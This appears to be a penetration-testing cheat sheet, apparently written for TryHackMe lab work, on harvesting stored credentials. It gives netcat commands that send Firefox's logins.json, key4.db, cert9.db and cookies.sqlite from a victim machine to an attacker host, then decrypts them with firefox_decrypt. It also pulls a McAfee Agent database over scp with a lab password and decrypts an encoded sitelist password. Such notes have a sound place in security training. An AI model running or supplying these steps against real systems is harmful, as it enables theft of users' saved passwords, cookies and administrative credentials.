Credential Harvesting
Browsers
Firefox
Common Areas
Location
Notes
Example
C:\Users\$USER\AppData\Roaming\Mozilla\Firefox\Profiles\
Depending on the version of Firefox there will be a folder with the files you need. ex: ljfn812a.default-release = Firefox 75.0
Gatekeeper
Exploit
Decrypt Credentials
Examples
Kali
We need to transfer the following files one by one.
nc -nlvp 1234 > logins.json
nc -nlvp 1234 > key4.db
nc -nlvp 1234 > cert9.db
nc -nlvp 1234 > cookies.sqlite
Victim
nc64.exe -nv $KALI 1234 < logins.json
nc64.exe -nv $KALI 1234 < key4.db
nc64.exe -nv $KALI 1234 < cert9.db
nc64.exe -nv $KALI 1234 < cookies.sqlite
This will show any passwords saved in Firefox
Kali
git clone https://github.com/unode/firefox_decrypt.git
python3.9 firefox_decrypt.py ./
Configuration Files
McAfee Agent
Examples
Victim
cd C:\ProgramData\McAfee\Agent\DB
Victim
scp thm@THMJMP1.za.tryhackme.com:C:/ProgramData/McAfee/Agent/DB/ma.db .
Password: Password1@
Kali
sqlitebrowser ma.db
Kali
cp /root/Rooms/BreachingAD/task7/mcafeesitelistpwddecryption.zip .
unzip mcafeesitelistpwddecryption.zip

Kali
python2 mcafee-sitelist-pwd-decryption-master/mcafee_sitelist_pwd_decrypt.py jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==

a
Last updated